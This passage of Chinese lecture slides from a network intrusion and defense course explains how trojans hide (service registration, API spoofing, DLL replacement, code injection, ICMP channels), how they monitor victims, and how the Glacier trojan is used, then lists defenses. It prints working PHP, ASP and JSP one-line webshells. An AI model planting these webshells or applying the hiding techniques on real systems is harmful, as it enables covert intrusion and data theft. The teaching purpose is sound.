(端口隱藏技術(shù))使用系統(tǒng)服務(wù)端口

(端口隱藏技術(shù))替換系統(tǒng)驅(qū)動或系統(tǒng)DLL (真隱藏技術(shù))動態(tài)嵌入技術(shù)(真隱藏技術(shù))設(shè)置窗口不可見這是最基本的隱藏方式。如果在Windows的任務(wù)欄里出現(xiàn)一個莫名其妙的圖標，傻子都會明白是怎么回事。要實現(xiàn)在任務(wù)欄中隱藏在編程時是很容易實現(xiàn)的。以VB為例，只要把form的Visible屬性設(shè)置為False，ShowInTaskBar設(shè)為False，程序就不會出現(xiàn)在任務(wù)欄里了。把木馬程序注冊為服務(wù)進程列表中不顯示木馬進程:在Windows

9X/NT/2000/xp/2003下，把木馬服務(wù)端程序注冊為一個服務(wù)就可以了，這樣，程序就會從任務(wù)列表中消失了，因為系統(tǒng)不認為它是一個進程，在任務(wù)管理器中就看不到這個程序的進程。這種方法對于WindowsNT/2000/xp/2003等操作系統(tǒng)來說，通過服務(wù)管理器，同樣會發(fā)現(xiàn)在系統(tǒng)中注冊過的服務(wù)。欺騙查看進程的函數(shù)Windows系統(tǒng)中，一般是通過API調(diào)用來查看運行的進程，常用的API包括PSAPI，PDH，ToolHelpAPI等。進程查看軟件API調(diào)用結(jié)果返回替換API調(diào)用返回的數(shù)據(jù)，保護木馬進程不被發(fā)現(xiàn)。替換系統(tǒng)驅(qū)動或系統(tǒng)DLLDLL(DynamicLinkLibrary，動態(tài)鏈接庫)是Windows系統(tǒng)的一種可執(zhí)行文件。DLL文件沒有程序邏輯，是由多個功能函數(shù)構(gòu)成的，它并不能獨立運行，需要由程序加載并調(diào)用。正因為DLL文件不能獨立運行，所以在進程列表中并不會出現(xiàn)DLL。運行DLL文件的最簡單方法是Rundll32.exe例如我們編寫了一個MyDll.dll，這個動態(tài)鏈接庫中定義了一個MyFunc的函數(shù)，可以通過命令執(zhí)行MyFunc函數(shù)的功能:Rundll32MyDll.dllMyFunc替換系統(tǒng)驅(qū)動或系統(tǒng)DLL攻擊者使用自己的DLL文件替換掉Windows系統(tǒng)中正常的DLL文件。這種方法利用了Windows系統(tǒng)的驅(qū)動或DLL，既可以啟動木馬，也可以隱藏木馬。不使用進程，屬于真隱藏技術(shù)。DLL木馬通過別的進程來運行它，如果這個進程是可信進程，就沒有人會懷疑它是木馬，那么這個DLL木馬作為可信進程的一部分，就成為了被信賴的一部分而為所欲為替換系統(tǒng)驅(qū)動或系統(tǒng)DLL這種方法與一般方法不同，它基本上擺脫了原有的木馬模式---監(jiān)聽端口，而采用替代系統(tǒng)功能的方法(改寫虛擬設(shè)備驅(qū)動程序vxd或動態(tài)鏈接庫DLL文件)，木馬會將修改后的DLL替換系統(tǒng)已知的DLL，并對所有的函數(shù)調(diào)用進行過濾。替換系統(tǒng)驅(qū)動或系統(tǒng)DLL攻擊者的DLL文件一般包括有函數(shù)轉(zhuǎn)發(fā)器。在處理函數(shù)調(diào)用時，對于系統(tǒng)正常的調(diào)用請求，它就把請求直接轉(zhuǎn)發(fā)給被替換的系統(tǒng)DLL進行處理；如果是約定的相應(yīng)操作(事先約定好的特殊情況)，則按照約定完成所請求的功能。這樣做的好處是沒有增加新的文件，不需要打開新的端口，沒有新的進程，使用常規(guī)的方法監(jiān)測不到它。替換系統(tǒng)驅(qū)動或系統(tǒng)DLL需要注意的是，微軟對Windows系統(tǒng)中重要的動態(tài)庫有一定的保護機制。在Windowssystem32目錄下有一個dllcache的目錄，下面存放著大量DLL文件和重要的.exe文件，Windows系統(tǒng)一旦發(fā)現(xiàn)被保護的DLL文件被改動，它就會自動從dllcache中恢復(fù)這個文件。所以在替換系統(tǒng)DLL文件之前必須先把dllcache目錄下的對應(yīng)的系統(tǒng)DLL文件也替換掉。但是，如果系統(tǒng)重新安裝、安裝補丁、升級系統(tǒng)或者檢查數(shù)字簽名等均會使這種木馬種植方法功虧一簣。動態(tài)嵌入技術(shù)另一種利用DLL隱藏木馬的方法是動態(tài)嵌入技術(shù)，也就是將木馬程序的代碼嵌入到正在運行的進程中Windows系統(tǒng)中的每個進程都有自己的私有內(nèi)存空間，一般不允許別的進程對其進行操作。但可以通過窗口hook（鉤子函數(shù)）、掛接API、遠程線程(CreateRemoteThread)等方法進入并操作進程的私有空間，使木馬的核心代碼運行于其它進程的內(nèi)存空間。這種方法比DLL替換技術(shù)有更好的隱藏性。通信隱藏：端口現(xiàn)在大部分木馬一般在控制主機后會在1024以上不易發(fā)現(xiàn)的高端口上駐留；有一些木馬也會選擇一些常用的端口，如80、23。有些木馬利用80端口時，在收到正常的HTTP請求仍然把它交與Web服務(wù)器處理，只有收到一些特殊約定的數(shù)據(jù)包后，才調(diào)用木馬程序。端口監(jiān)聽的缺點：木馬在等待和運行的過程中，始終向外界打開著一個端口，容易暴露。潛伏技術(shù)：利用非TCP/UDP協(xié)議，如ICMP協(xié)議。ICMP木馬監(jiān)聽ICMP報文，當出現(xiàn)特殊報文時，它打開TCP端口等待控制端的連接。這種木馬在沒有激活時是沒有端口開放的。更好的ICMP木馬嚴格使用ICMP協(xié)議進行數(shù)據(jù)和控制命令的傳遞。通信隱藏：非端口木馬一定要直接與其控制者通信嗎？通過中間方交換信息電子郵件網(wǎng)盤網(wǎng)頁通信隱藏四、木馬監(jiān)控技術(shù)監(jiān)控技術(shù)木馬連接建立后，客戶端端口和服務(wù)器端口之間將會出現(xiàn)一條通道，客戶端程序可由這條通道與服務(wù)器上的木馬程序取得聯(lián)系，并對其進行遠程控制。木馬的遠程監(jiān)控功能概括起來有：獲取目標機器信息記錄用戶事件遠程操作(1)獲取目標機器信息木馬的一個主要功能就是竊取被控端計算機的信息，然后再把這些信息通過網(wǎng)絡(luò)連接傳送到控制端。一般來講，獲取目標機器信息的方法就是調(diào)用相關(guān)的API，通過函數(shù)返回值，進行分解和分析有關(guān)成分，進而得到相關(guān)信息。(2)記錄用戶事件木馬程序為了達到控制目標主機的目的，通常想知道目標主機用戶目前在干什么，于是記錄用戶事件成了木馬的又一主要功能。記錄用戶事件通常有兩種方式：其一是記錄被控端計算機的鍵盤和鼠標事件，形成一個文本文件，然后把該文件發(fā)送到控制端，控制端用戶通過查看文件的方式了解被控端用戶打開了哪些程序，敲了那些鍵；其二是在被控端抓取當前屏幕，形成一個位圖文件，然后把該文件發(fā)送到控制端顯示，從而通過抓取得屏幕知道目標用戶的操作行為。(3)遠程操作木馬程序的遠程操作功能如遠程關(guān)機、重啟，鼠標與鍵盤的控制，遠程的文件管理等等。木馬程序有時需要重新啟動被控制端計算機，或者強制關(guān)閉遠程計算機，當被控制計算機重新啟動時，木馬程序重新獲得控制權(quán)。在木馬程序中，木馬使用者還可以通過網(wǎng)絡(luò)控制被控端計算機的鼠標和鍵盤，也可以通過這種方式啟動或停止被控端的應(yīng)用程序。對遠程的文件進行管理，比如共享被控端的硬盤，之后就可以進行任意的文件操作。一句話木馬一句話木馬是指只有一行代碼的木馬，利用Web編程語言（asp、php、jsp、aspx）的某個函數(shù)來執(zhí)行攻擊命令，也稱為webshell。PHP一句話木馬示例：<?phpeval($_POST[sb])?><?phpassert($_POST[sb]);?><?$_POST['sa']($_POST['sb'],$_POST['sc'])?><?php@eval($_POST['cmd']);?>一句話木馬ASP一句話木馬示例：<%evalrequest("sb")%><%executerequest("sb")%><%'<%loop<%:%><%executerequest("sb")%><%ExecuteGlobalrequest("sb")%>JSP一句話木馬示例：<%

if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());

%>內(nèi)容提綱2木馬實現(xiàn)原理與攻擊技術(shù)3木馬實例4惡意代碼1木馬防御冰河冰河開發(fā)于1999年，跟灰鴿子類似，在2005年中美黑客大戰(zhàn)中為中國黑客增了不少面子。作者：黃鑫（glacier，西安電子科大，2000底加盟安全焦點，開發(fā)了xscan）包括兩個可運行的程序G_Server和G_Client，其中前者是木馬的服務(wù)器端，就是用來植入目標主機的程序，后者是木馬的客戶端，也就是木馬的控制臺。冰河客戶端界面冰河的主要功能自動跟蹤目標機屏幕變化(局域網(wǎng)適用)完全模擬鍵盤及鼠標輸入(局域網(wǎng)適用)記錄各種口令信息獲取系統(tǒng)信息限制系統(tǒng)功能遠程文件操作注冊表操作發(fā)送信息點對點通訊冰河的使用—連接服務(wù)器服務(wù)器端運行后，可以在控制臺上進行連接。單擊工具欄上的快捷按鈕“添加主機”，彈出如圖所示的對話框，輸入遠程主機的相關(guān)信息即可。冰河的使用—連接成功后的信息

連接成功后，則會顯示遠程主機上的信息如硬盤盤符等，如圖所示。冰河的使用—搜索服務(wù)器以上直接連接是一種方法，冰河還可以自動搜索已經(jīng)中了冰河木馬的主機，只需要簡單的設(shè)置即可。搜索服務(wù)器搜索到9冰河的使用(續(xù))在9中安裝了木馬服務(wù)器后，就可對這臺計算機進行操作了。冰河的功能非常強大，它有“文件管理器”和“命令控制臺”兩個選項卡。點擊“文件管理器”可以管理被入侵的電腦的硬盤。文件管理器文件管理器—下載文件冰河的使用(續(xù))單擊“命令控制臺標簽”，可以看到這里有眾多的功能。冰河的命令控制臺獲得系統(tǒng)信息和口令捕獲對方屏幕向?qū)Ψ桨l(fā)送信息管理對方的進程2023/11/24網(wǎng)絡(luò)入侵與防范講義153控制對方系統(tǒng)2023/11/24網(wǎng)絡(luò)入侵與防范講義154注冊表管理甚至可以對桌面等其它信息設(shè)置冰河的使用(總結(jié))冰河幾乎可以對入侵的計算機進行完全的控制，完全可以當作一個遠程管理工具使用。內(nèi)容提綱2木馬實現(xiàn)原理與攻擊技術(shù)3木馬實例4惡意代碼1木馬防御木馬的防范雖然木馬程序隱蔽性強，種類多，攻擊者也設(shè)法采用各種隱藏技術(shù)來增加被用戶檢測到的難度，但由于木馬實質(zhì)上是一個程序，必須運行后才能工作，所以會在計算機的文件系統(tǒng)、系統(tǒng)進程表、注冊表、系統(tǒng)文件和日志等中留下蛛絲馬跡，用戶可以通過“查、堵、殺”等方法檢測和清除木馬。木馬的防范防范方法主要包括：檢查木馬程序名稱、注冊表、系統(tǒng)初始化文件和服務(wù)、系統(tǒng)進程和開放端口，安裝防病毒軟件，監(jiān)視網(wǎng)絡(luò)通信，堵住控制通路和殺掉可疑進程等。木馬的防范常用的防范木馬措施：及時修補漏洞，安裝補丁運行實時監(jiān)控程序培養(yǎng)風險意識，不使用來歷不明的軟件、郵件即時發(fā)現(xiàn)，即時清除

本章小結(jié)討論更新：將源目錄下的所有文件（含子目錄）拷貝到目的目錄下問題一：360認為其是勒索病毒的可能原因是什么？問題二：360采用的是特征檢測還是異常檢測方法？作業(yè)一個簡單的遠程控制型木馬（Crimso